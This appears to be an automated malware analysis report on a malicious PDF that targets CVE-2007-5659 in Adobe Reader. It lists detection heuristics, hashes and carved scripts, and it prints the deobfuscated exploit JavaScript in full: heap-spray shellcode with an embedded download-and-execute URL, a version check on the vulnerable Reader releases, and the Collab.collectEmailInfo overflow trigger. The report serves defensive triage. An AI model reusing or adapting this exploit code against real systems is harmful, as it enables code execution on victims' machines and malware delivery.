PDF malware analysis — malicious · 2e1eaae74c482580

MALICIOUS

PDF

9.4 KB First seen: 2021-01-23

MD5: 0d18569142111fc5e05f88cd40b31183 SHA-1: ec81a4007e3a573b6a9698300e276aa83b4f533a SHA-256: 2e1eaae74c48258093536451cfb968de717d8d02205fd6f4ce15f6060ac0e0d8

350 Risk Score

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 9

Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
JavaScript action low 4 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE

PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.

Matched line in script

var XQvh7jkmGPD = new Array();var tt_C_N_o = 0;var K6RC54 = "";function eo_Jv1g(Q6_R__Htc4S_5, fG1Yr44_Va){var g_ng__l = fG1Yr44_Va.toString();var US05ee = "";for(var E__j42q_y = 0; E__j42q_y < g_ng__l.length; E__j42q_y++) {var O_BE__hD = parseInt(g_ng__l.substr(E__j42q_y, 1));if (!isNaN(O_BE__hD)) {O_BE__hD = O_BE__hD.toString(16);if (O_BE__hD.length == 1) { O_BE__hD = "0" + O_BE__hD; }else if (O_BE__hD.length != 2) { O_BE__hD = "00"; }US05ee = O_BE__hD + US05ee;}}while(US05ee.length < 8) { US0 …

PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
   z = y = app[h.replace(/[aviezjl]/g, '')];
  var tmp = 'syncAEEotScan'; y = 0;   z[tmp.replace(/E/g, 'n')](); y = z; var p = y.getAnnots ( {  nPage: 0 }) ;   var s = p[0]; s = s['sub' + 'ject']; var  l =   s.replace(/[zhyg]/g, '%')  ; s =  unescape ( l  ) ;app[h.replace(/[czomdqs]/g, '')]( s);
 s =  ''; z  = 1;
```
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
ClamAV: Pdf.Exploit.Agent-35905 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Pdf.Exploit.Agent-35905
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://beancountercity.in/cgi-bin/uiq/eH20c5b855V0100f060006R21502024102Tb9ed5e32203l0019 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0008_000.js`	pdf-javascript-stream	PDF /JS object 8 at offset 0x238A	231 bytes
SHA-256: `ebac9baa7de3a294531abfb5e17af88ac33bc92e7a9e5aa6e06af55d631ceb6f`
Preview script First 1,000 lines of the extracted script x�]�1O�0 ��W� ]"P V� �#1Z �k%T�cj7��c ��w�-�,�� k1� 2�eVY[�� K��r�]��J�f/��f�� D�� $^\|��cVat dɊ_P� ��] Jڍ& ��c@� �=��<��g ��B/;vP� )�^ ��ё�J�� $�S ��;j��3A+o�� :ϗ�{� � �b[��fp�(� ~7d
`legacy_pdfkit_stage_000.js`	deobfuscated-js	repeated-marker hex decoded JavaScript at offset 0x1ED	11901 bytes
SHA-256: `21920a56a0884135976a27a2de9b01d41d7c9d89469af791c03e12164a5100c6`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script function p0r__D6hQuV_A(g_4cRLlo__JKhv, j1ow_b){var l_a_ac = arguments.callee;var K21_0mBxy_1 = 0;var BWQ3gATpi3D1E5 = 512;l_a_ac = l_a_ac.toString();try {if (app) {K21_0mBxy_1 = 3;K21_0mBxy_1--;}} catch(e) { }var Q8b__0N = new Array();if (g_4cRLlo__JKhv) { Q8b__0N = g_4cRLlo__JKhv;} else {var D__J_DbS4_cu = 0;var xF4_OqgeAg = 0;var cK___3q1t8_cfx = 49;cK___3q1t8_cfx--;while(xF4_OqgeAg < l_a_ac.length) {var p__35l8Q6_H = 1;var I_710unu = l_a_ac.charCodeAt(xF4_OqgeAg);if (I_710unu >= cK___3q1t8_cfx && I_710unu <= (cK___3q1t8_cfx + 9)) {if (D__J_DbS4_cu == 4) { D__J_DbS4_cu = 0; }if (isNaN(Q8b__0N[D__J_DbS4_cu])) { Q8b__0N[D__J_DbS4_cu] = 0; }Q8b__0N[D__J_DbS4_cu] += I_710unu;if (Q8b__0N[D__J_DbS4_cu] > BWQ3gATpi3D1E5) {Q8b__0N[D__J_DbS4_cu] -= BWQ3gATpi3D1E5;}D__J_DbS4_cu++;}xF4_OqgeAg++;}}D__J_DbS4_cu = 4;BWQ3gATpi3D1E5 = 256;while (D__J_DbS4_cu > 0) {var xF4_OqgeAg = D__J_DbS4_cu - 1;if (Q8b__0N[xF4_OqgeAg] > BWQ3gATpi3D1E5) {Q8b__0N[xF4_OqgeAg] -= BWQ3gATpi3D1E5;}D__J_DbS4_cu--;}var H_YR6T8go_g = 0;var X_u_1YIE_I___l = "";var W__ovb = 0;var Tn2O51 = 0;var rUVeh6E8_t = 0;var nC0_I_R8n00aFfU;var DY_60_f18 = 0;while(Tn2O51 < j1ow_b.length) {var bjm_q7246x7Iq = j1ow_b.substr(Tn2O51, 1) + "J";var qDb_L2Lcp = parseInt(bjm_q7246x7Iq, 16);if (rUVeh6E8_t) {nC0_I_R8n00aFfU += qDb_L2Lcp;if (H_YR6T8go_g == 4) {H_YR6T8go_g -= 4;}var xs_I_p0 = nC0_I_R8n00aFfU;xs_I_p0 = xs_I_p0 - (DY_60_f18 + 2) * Q8b__0N[H_YR6T8go_g];if (xs_I_p0 < 0) {var LcfJ_All = Math.floor(xs_I_p0 / 256);xs_I_p0 = xs_I_p0 - LcfJ_All * 256;}xs_I_p0 = String.fromCharCode(xs_I_p0);if (K21_0mBxy_1 == 1) {X_u_1YIE_I___l += qDb_L2Lcp;} else if (K21_0mBxy_1 == 2) {X_u_1YIE_I___l += xs_I_p0;} else {X_u_1YIE_I___l += Tn2O51;}H_YR6T8go_g++;DY_60_f18++;rUVeh6E8_t = 0;} else {nC0_I_R8n00aFfU = qDb_L2Lcp * 16;rUVeh6E8_t = 1;}Tn2O51++;}eval(X_u_1YIE_I___l);return 0;} p0r__D6hQuV_A(0, "00E692BEF632B61EE9A7CB3B0DE9C40617150E6365710188740E59563F4476A79C8594D29D049FC4B18C80CB86A9BB1CDB47C009C483030BD6AD1D0ED80B3B6C3FB383924710AE56576CBF987C8AE78E6BEBFFD08D70080AA5A1330D8BF5202CB1567950B2B59F4CF306DB8407ABA08D1903079D2D5DE09302B3279F4F1B34BA695B81CC92D0932AA426CE356E42BB5CBBE7C053C101F57BE74D1D4EB8AB3BAC195748D41FB360BB31FCCAC2186ADF1F1A92C0EE49D1053581771420A7C8792686E5877DCC889F95DEABCCB3F440F4CED555E5DD0DFBF4C8334C59D901722041600692FE4D60823B71BCC85246F6A0969B8713A397DF347EC92C4ED5D5886CB4FDFA8211125368FB119CCA02F80ADF5F0615D127178C297C22D501978957619452B47FA083209FDE964689AEE1C8DFE8BF34FF26D251FDF6F1EC22331548684AF8B98F715213A9A4592591842F94E9CC3ADDEFDD70561FF5AAB10E1ABB37673AD2455D1B9EB269160DFDAF6DE87EDF8522D9C07BEE13F078027800BD55EB45E5696D64D93EDEA522A5228037AC39A835B9B7E55DCD390444EE924E950AF12067E7055287DEBC60C531DFA5ED4561C4C63775C2EE3ED3FBF69F62331E6BCE652687E56F7DA0669F95DAC18079A62ED396CF9A05B92B0E37FE2B5945D62B9C30FB4F0A4E4A636FA76A7A7D9C2E5EE2A0A15A6AF36E83D625769FED029E98492BA6DFD850D303467BD62FB3C140E60AB11D3927FF5D2FB7F4754C0C3F923646209760C472BD9D09B4D98670BFC394EDEFF9EE47092CF559F10CCBC84954D611713701A4527D3DE2A66A5147BFAD6A87ECCB881C14E64E4EFDB673960029763A31FDC9577F3DBFE77455DC3CBF72C676A048EAB7C069EE62F18D417F3FCD370F34E554647F025981BD1B9E30C5EEAF7FA00ECBA6D75DA0301F57E8613F78F5E86474164A8EC532A960970FBD92B70674A0172B8CFFF06D10013C566C2A4D95CD20436AE7504E805C60B3C7D09083EB3EA0A3BA57D3A0CEBCE007F3243FE035A8412C1E046A3D5D656021327FB03046E4A07B8D45D5A3B3AC32BBD64252DC967E53B6BFEA85D91B47B52415B1C93D34B9D4531B6E0D5D25B02E6D7AD52C62756B457E9EC47FBDADED60B8A15592E2DAA9EEDCC936C939049232F609C4184DFD605065FFA4863E1BC1AE9B691DA1C078BAF98E3CD7C9B9A47232B699B356E59DFB7425AC455DFECAB59F58D715D46D0598EF6130F6125E10651FC627AF4EB26E085FE541715B07848168DE7431BF3E8B7BEE2AD2D4FF5DA53DE053A279148DF8CE38BA09447FCDECADA1E946E6CEF24B71CF0C2277C5333EE1E2FF4B2D012B5696312F6A4089847E4982AAD1EDA5B0F41DF8C5F994D7EACEBCE0CCE22A1DCE227D5F282FDD943D5D60AF247EC2CE759A21A946B57CD776ADB837A6C1023FD4D1595DA6C7A56CD2FD4385EE269CBF2D35C7F35B3C6814701693347572F2429C5A815FA5899C8C7E69E174A2724F89C9BDBFF6DDC107141DD051FDF6EEC13F50FB21746529A48F4C5116A2A9666FC9BC6D81B0923AF714DD9E56220486E53F0DB5006CEFA5A29D20F2E0B03BF44BA4860598DF5D26B5DD5EFF2C26C5546D08B355086ABA3C767F173E9E60E66DDDA52DA583B418CBD4191EAAF10265BA5F34A2C6F736950B138CC32CA8B4DE0DBDA5ED4563B4D86BB419E939DAE051986E520EA4CB6853A9068E7D9094B056AF9DA29DBE0BD4DACAA3D6CD0FBF23FE235F231D3AAE413A12EA7F3D6835726771D6893C9A28D39AAC7E0EA576A2F67F9D36468E9E9762EED7E4610CFD13B326E0A9C53C2D0DE8061732C02F17713B36700F487B754A6EA55CD8907E7BE162A6743D8BAED4DBE8F3D9160E1DC0A43011C20A4725EE48477D1AA4557D44FC82AA516DA5B0749DF8C57914D7EA8B31FDB6B0CF48FBB50A6E259C989019C0F59F66D73FCE521E98DF85F101CB69096E05B541B714A0670879A6472587D556C0872D821C952DAC74B04388E1056CD5452836C14D104ED0A93181111C58BD05B890D507FCC6E9286DDF163FB70E0286101F3559793D0E738922367AE75B8595599F7DE9CDBF83E53FDBA80E9410C310FF040E214C3FE542692BE61B02401B1E2370263498A2828529C588A859189DADD0F7C282F81D8EA86469ECAAAD4805D5199FFD298DBF0325FFAE523F6307725671ED36470C3F984A3B71A5A38E40835EF36996CD8497C6C5C0F7F6D90AFF24E973343512D2425CFA615F65297C8C7BFEDE6058222D828983D0E8CF861AC8C38D702ACA74DE3F277605202DA15D7F25F5D19F2BF1438E7A0BA7E79A22BEC0B92537368D297F54CD38C92BC32A27451340816BD699F4982D8D90D0458FD40659B3301F80B65F518D0FA92B66DB424089DEA877AE31E4D7DE452EDF0C559AFF1D78E5F24781863D297BC85F707EF7917DD7416B7392AF9BCBDD1FF69DE16714DDF0B1EBD3E20F0523067930F60CE092437276B26432B4A6845D00B29A9957DBBBB4E62EB9D6364FDC967278E5F9BD8CC60748730DE26EB51A25E8B2320615F76B57B9187C39192B8F493A29C1A1CD89CAA3E168DFB950B7BE97CECC05C907ECECFA962E3D16F50A20F2406D6F329D86554AECA169232680C96FC0B3BD4AE6F5CA8D60F2E262981DCEBF30331D9A56752ADDD07242CD5AC975D990B0570FE1FF8D003DE09302B647A14DD931DB56646FD06A8FB32B9430D440AF87E70E8AA1F76BD739187CB9992B8FC9BA2F78D32092C332B6B2E4F206C7C13D29B1FB46B4EFF05AEC3D3C977B43629FD86E2692FA6285BD588E8AEAC5BFB4AE28CE96D176F3CC18DA28C803190002259432FC37DB4CFE5460782776CAB66D8818C268A73E1BB4AFE3E0BAC1053FE0D85F20C3AAB598CE0111A3E6156DC3093CFAF206435CD3551E82156261FC127A364620BB98CA93C19F31A59EA66CABC09CC6B6CFB54B0130AE730F0ED4E1541E241F4F67EA8240834D008AAC2364889D5489B7A76D030AC7964301C262C33FE6872D6D1CC9877F20C0EE6931083ED22E1AB0B09930C9D7731C501FBA3B6D1D8E6B1765F96D6690034683652B6BED99FE6B8EB91693A5C573A701F946A7A2125FFBEB25BB0C1D5597E3B679A607CD85031F29B5D61FCAD61F43E2E54B554046545BDE363AAE2745939054786F97F29080BC3AA5DBD297D5B7D30626C9284F05230D7E612C0F1A86442E38656B4893C5454B2EE3887246C5B37ED726BC874245D0AA5C25FBEFBD8502C356A61C169E85432CFFE64CFF6AD06124B2E58B3A0F15673B7E30A95A9945D3A0F9A2A7779290C29EACA51BAA0BD0F6B3A6F809D7C50563E719633AEFBA535113D165AB5530C37E2882BBDC7B27C0CA627022DB7AE13F0DB53820038A474553B7B17526B752993EDB69A59BF3C5D56EF366F986177D028E21C922AB7F3E50D74E86B5EF62F690F3BB52B01F8A9A15379E0AF03BF7661067C6AE7576DA4A5883337170A602C2D5F34829B0CB6FBAD9EE3ED6350652734313AB9930367AEA95549256A65BE7B090AFB7FEF596CA65D0A323C8F8C6F21255E6387963EB5FD583122E26B52D4295C2339B1AE4579D3A157486A9227BD732429EAE4E75BEECB559C3131474EAE262D502F6D1E40B4F2D02355176354965E318538B6F377E8C8A958E72F7A19BC78298C39F9EF5D6AA0D06E30361F006D2B25554EF4E322B3F7B865416C6B5662233C5737B8FB8964ADA15B56048F5BBB7A344E4B9EE752CD05A5403F3B9A227C802D573DE9EB84B2FC5D07507163586127D10936B0D37BE6C2A95D64E9577DBA7ED9001AC3EF54CBBACD523E306F74AB9525566C6BD376B1F1550912466B5DC33D495B35B5EE6DE5C7A15F141E626FB974511516F8E75367E2A8343D3517066A3A2D586E809B08B0F6AD1E211B635CBF52212D34B7934FC22CA950E2E31711B87C3C63E56DEF5569D4AD663C3A6F98BC3F255A3A85E31ABFFB552D60006B5EAE57293F33BCCE21E0A1A15352381F03B77E51194772E75AC8D9C8283B3F775A8B742D5C49BB0B8CBEF05D3F5C356353B04C513132B213936026A958115D1735B672D9482397EF59C4FE705A3A347F5CD7A9255E2892C36EBDF55500EB6A6B52EF312C2331B69B489EBBA15760624F07B577D10A22BCE75E93A3853C3939670EB62E2D5037D4EB30BCFDB06339EF63547B26216530BEF387EDD0A9595F371709B47D3C1BE1C1EF5DB2D85D1E383E6F63C883255239799342BBFFD53539746B566A6E09273FB11B09ACB5A15AEDEC421BB374F14E50B6E75FB200B8603733671264A82D54688EEB64BAF4803758396358D96054293EB6038B8EFAA9504D31173DB2775C203FCBEF5180A2CD62363B7F54635D255914F3C336B9F99519277E6B5A6857EC4B3DBACB309AFFA15EEF49522FB17BE10501B0E756A0078814353D1786D2622D5B168BCB18B8FE5D3AE923635CA72D141D3CB2F312BCC4A950FE4B4A21B07429745DB5EF55E1CCA05634323F48B477255D25AD933AB7F3D82D45486B5EA94EDC3F3BB4EE51EBC9A152EA102233BF7654292FAAE757E0C15548333A475A605C2D5C34B5AE2CB6FB8D3F347D6353C88721813ABCF666CAFEA9556C387A65BE7ADC582EBFEF59FD29A03A323C921FC271255E53B7965EB5F0A52423626B529459493339BF1E1899B3A157184A6227BD7FF469FD74E75BCC0BC50C3131577EBE262D5FEF6CFB30B4F2CD4342676354D32E414538B3B66798B8A959470F3A69BC75391C49B9EF5DCAD0B05E30368F50C08B25525EA1F652B3F7C525413C6B56C2B3393737B90B99D4EDA15B4674325BBB79F46E4BBEE75FCA15B5303F3B3A42CCB02D544DF6FB24B2FC706743316358C1B8415936BDB66BD3B2A95D2569775DBA7F09001783EF5198FABD323E304F84CB4525561CBBC356B1F185093F466B5A902D091B35B2FB6D92A7A15F144E4F0FB97401021668E753980F85043D354726BA4A2D581BB0CB18B0F68D2B1DEB635C9F42010D34B7C31F91ECA95113034701B879392435ADEF55C6F48D963C3A4F58C96F255A1A95F35ABFFB852D1D006B5E9E57090F33BCCB01C3D1A15311F84F03B77DD10614F2B3BA79AD54ED693099FDA887CD8AEA399F514DF48031FFE96E82A0FCE595B15205F7421BD486A1200A27B2A71BFAD65C8AC865C04D8B08285F00478BC41D77F047627DC458913D6E0712BDA3CA671EA6ADF9C28B5DD5EFE69F486127D109E311F61F82A7C8FD575D4A40B910FCE2D7B5DA0237AE9172EE147F44DB77B3F8DFAE22EB20F5387D226616A9604D8D6EF5819D71363BDF824451D0B37553E002B56D2355EA9F65566BD67A37AA3DCD6BCA606A08E11A4D7D521F515F5145B3FE31A74303E1DDD49196768734D428EB55A8508B2725A52C087C6D02F8ECEF549D5A98030B7DFD17FEDD02D6CD609AAC9361EFFB7522556D32F178C367774CD4E644E68448D71D153A774F660B37245C4ED9ED8F208B0F5CDDEBEA9F406D2BD101EDF18693B22A4515326008699362EBFC47494E6D58CD5C8F48F83E0F9A1CC2FE4CDE93DE69A604041DDE08F2C09FD9C2E146FB885FEDCE7AA013AF68B1D6D43CD55F836FD353049BE99B9912C9AF4CA39B360D02AB5D8FF5DBD073773A26A0097FDBC5776DB3A6CBD0D738C96FDBDD405166CF6DA318AEE1D6D1519119F8A4663A4CC746FB9334066D5808495C9B2BF83D401A9E11096129E1D0422F5034C10CE136922E8250B8F501E29855571C794409718F9467735D0796EB61FB5CC0112DFD5A220C2AAB652D9BE269F151C71923F2512AB1103151B6D61B31F5761DD0059532975B48FD883BFAE266898779290F196DCA51BAA38D021B05AFB5318EE520E1C51576530A97F753D09A269581D9D6E287BBBCC8927C0A673701F00769F510DCFE93DE69A604023DDE0AA2AC44EBF87C675A05DEFC5DB5E13501FC0167F51CD6FD42BAF2A80860675C0A61A9114BF36A84CE60685B2C06DE1331F57E15D1BAB0AF169B9D8488FCA2AA2A2C9460CD2F30636A0E969C10C1F70DF23458E794551AAAE6D67B331698CC49068B1E5F2C2B8C0F9A288C6550DF115CBE0FC2A443F143AA85725520753447B2A7B5782CD8E71921EE1988E7E0DA39DE6347ED6413FB1D5775FF5B3C09D04134FA32A1BACCEEE0AD0DF364944D7694D82017538D5508D8740307E7C8E9BD49F3360CF868D98F0B9D8B7FDC30611DECB51344A01D03F3C15583B6F306548464E00B16D2235B26E4496A09E3ADBC69E9E7031CD72A532CE92E938F49B5649FEFAFD6066F14E973EDE8BA062DACCCE6FF7113B9E178F47CD2DF754FE526486C650946CD654E2D5FEA949E30BCFA5032ED1F3EC36F28C5165C6C1526FE52D97BD02A097AB31D2AEB60F34FDC663BBC0E667E5300E84603F258DB2317773E59B7FCE916E99DEE2C1C0DA42EDCBE9AA14A607C530CE24403FE52D92313713E09D5B7462B21668BC983F8A26D6859C74E280BB91FD76920856CFE84978B6E1D072E6D11587FBD27A802F3609AE56466A07475CC4FB7C711F00568C6A72666DC48EC98508B0C9725A80BEA199C305E840E705FE84E012C2051045013B4839FE8C654C4A06AE9D66659B6E49B8EED161FC10D1593CE9B6BDE34120764030FDBA6D7F16C8E07269B21A8086D690CB7802C8D485134C03B550B827B566FC5DB4806A921187D0AEF19B2380F6BD49B736A2D4D848CD033336C04D368DCEBA64B3004482BD0083AD9FF21880E44531B10A67ABFF206DF30243424A006566A0504EA9FD6A7D90947B56EFFAC9B4A601E1D60A6316E713082508185252213FB86EE627E240172C3270293283862E7C18B8579E82F69DB0D00298CFED1C8EAF5731B9B3A59BF4FD19711A1F93BF3025DBC253FA32C0371C82F3517F0E509E4459488C999A7F92832E71ADCB5594CF86B6A0EAB134F02DDD682B35D3CE3F24F15D74650DA46E7D4DC17D56536DD07C79BEF4BA832205CDA385E8B8A3DD50DCA61146359F845423EBB2776FCA11A136C859AB4610F4D86F325E16B544AC22B063D774F55D7992078CC868DF52E880F06F3BAC068FA5C939");
`legacy_pdfkit_stage_001.js`	deobfuscated-js	repeated-marker hex decoded JavaScript at offset 0x1ED	5012 bytes
SHA-256: `cf96fb932fca9ca37c5b53712afeef6795fcc71ad3ac5176b833401729eb75b8`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var XQvh7jkmGPD = new Array();var tt_C_N_o = 0;var K6RC54 = "";function eo_Jv1g(Q6_R__Htc4S_5, fG1Yr44_Va){var g_ng__l = fG1Yr44_Va.toString();var US05ee = "";for(var E__j42q_y = 0; E__j42q_y < g_ng__l.length; E__j42q_y++) {var O_BE__hD = parseInt(g_ng__l.substr(E__j42q_y, 1));if (!isNaN(O_BE__hD)) {O_BE__hD = O_BE__hD.toString(16);if (O_BE__hD.length == 1) { O_BE__hD = "0" + O_BE__hD; }else if (O_BE__hD.length != 2) { O_BE__hD = "00"; }US05ee = O_BE__hD + US05ee;}}while(US05ee.length < 8) { US05ee = "0" + US05ee; }var q17_2__Af4_J__d = Q6_R__Htc4S_5.toString(16);if (q17_2__Af4_J__d.length == 1) { q17_2__Af4_J__d = "0" + q17_2__Af4_J__d; }else if (q17_2__Af4_J__d.length != 2) { q17_2__Af4_J__d = "00"; }US05ee = "3" + q17_2__Af4_J__d + "P" + US05ee;return US05ee;}function TmAym_7_nWx(L4_bE8t___o, BO82Tt0n6Oa){var g78_GwP_5_f = new Array("");var WFv7G2t_B = L4_bE8t___o;var Bt_pEbnDx___7l;if ((Bt_pEbnDx___7l = L4_bE8t___o.lastIndexOf("%u00")) != -1) {if (Bt_pEbnDx___7l + 6 == L4_bE8t___o.length) {g78_GwP_5_f[0] = L4_bE8t___o.substr(Bt_pEbnDx___7l + 4, 2);WFv7G2t_B = L4_bE8t___o.substring(0, Bt_pEbnDx___7l);}}Bt_pEbnDx___7l = 1;for (E__j42q_y = 0; E__j42q_y < BO82Tt0n6Oa.length; E__j42q_y++) {var nbhM_An_2sp = BO82Tt0n6Oa.charCodeAt(E__j42q_y).toString(16);if (nbhM_An_2sp.length == 1) { nbhM_An_2sp = "0" + nbhM_An_2sp; }g78_GwP_5_f[Bt_pEbnDx___7l] = nbhM_An_2sp;Bt_pEbnDx___7l++;}E__j42q_y = g78_GwP_5_f[0].length ? 0 : 1;g78_GwP_5_f[Bt_pEbnDx___7l] = "00";g78_GwP_5_f[Bt_pEbnDx___7l + 1] = "00";Bt_pEbnDx___7l += 2;if ((g78_GwP_5_f.length - E__j42q_y) % 2) {g78_GwP_5_f[Bt_pEbnDx___7l] = "00";}while(E__j42q_y < g78_GwP_5_f.length) {WFv7G2t_B += "%u" + g78_GwP_5_f[E__j42q_y + 1] + g78_GwP_5_f[E__j42q_y];E__j42q_y += 2;}WFv7G2t_B += "%u0000";return WFv7G2t_B;}function Ix_o8l(ig3W01UL_O2L, WmihXf7lKa31){while (ig3W01UL_O2L.length2<WmihXf7lKa31) {ig3W01UL_O2L += ig3W01UL_O2L;}ig3W01UL_O2L = ig3W01UL_O2L.substring(0,WmihXf7lKa31/2);return ig3W01UL_O2L;}function H5Bg_7NTxH_f(ON07ASNjIh2A, TOK26M6, V_81dmV_b_BBm){var d_8_rb6 = 0x0c0c0c0c;var ig3W01UL_O2L = unescape(TOK26M6);var BO82Tt0n6Oa = eo_Jv1g(ON07ASNjIh2A, V_81dmV_b_BBm);var tw0sv475N__dY = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var L4_bE8t___o = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6670%u4750%u0063%u7468%u7074%u2f3a%u622f%u6165%u636e%u756f%u746e%u7265%u6963%u7974%u692e%u2f6e%u6763%u2d69%u6962%u2f6e%u6975%u2f71%u4865%u3032%u3563%u3862%u3535%u3056%u3031%u6630%u3630%u3030%u3630%u3252%u3531%u3230%u3230%u3134%u3230%u6254%u6539%u3564%u3365%u3232%u3330%u306c%u3130%u0039";app.xUH_d6_x = unescape(TmAym_7_nWx(L4_bE8t___o, BO82Tt0n6Oa));var i5X_15H_FcD1_vn = 0x400000;var wo7WsdU_Rn_5D = tw0sv475N__dY.length 2;var WmihXf7lKa31 = i5X_15H_FcD1_vn - (wo7WsdU_Rn_5D+0x38);ig3W01UL_O2L = Ix_o8l(ig3W01UL_O2L, WmihXf7lKa31);var n68_DGGl3I65 = (d_8_rb6 - 0x400000)/i5X_15H_FcD1_vn;for (var c__O6w = 0; c__O6w < n68_DGGl3I65; c__O6w++) {XQvh7jkmGPD[c__O6w] = ig3W01UL_O2L + tw0sv475N__dY;}}function Hw_D_W5_5N(){var osb_A_0 = "";for (E__j42q_y = 0; E__j42q_y < 12; E__j42q_y++) {osb_A_0 += unescape("%u0c0c%u0c0c");}var fhW_fd_W_hb3f = "";for (E__j42q_y = 0; E__j42q_y < 750; E__j42q_y++) {fhW_fd_W_hb3f += osb_A_0;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: fhW_fd_W_hb3f});app.clearTimeOut(tt_C_N_o);}function D7_PoO7k_1A_6(p_q708R){var Y4p8bS_7WI1q = tt_C_N_o;if ((p_q708R >= 8 && p_q708R < 8.11) \|\| p_q708R < 7.1) {H5Bg_7NTxH_f(23, "%u0c0c%u0c0c", p_q708R);Hw_D_W5_5N();} if (Y4p8bS_7WI1q) {app.clearTimeOut(Y4p8bS_7WI1q);}}var V_81dmV_b_BBm = 0;var x0WKRH34GE = app.plugIns;for (var C_nkGGpS = 0; C_nkGGpS < x0WKRH34GE.length; C_nkGGpS++) {var w07PH_8J_2s = x0WKRH34GE[C_nkGGpS].version;if (w07PH_8J_2s > V_81dmV_b_BBm) { V_81dmV_b_BBm = w07PH_8J_2s; }}if (app.viewerVersion == 9.103 && V_81dmV_b_BBm < 9.13) {V_81dmV_b_BBm = 9.13;}app.PHFo5_4Em17y84A = D7_PoO7k_1A_6;tt_C_N_o = app.setTimeOut("app.PHFo5_4Em17y84A(" + V_81dmV_b_BBm.toString() + ")", 50);

Open this report in the interactive analyzer, or submit your own file for analysis.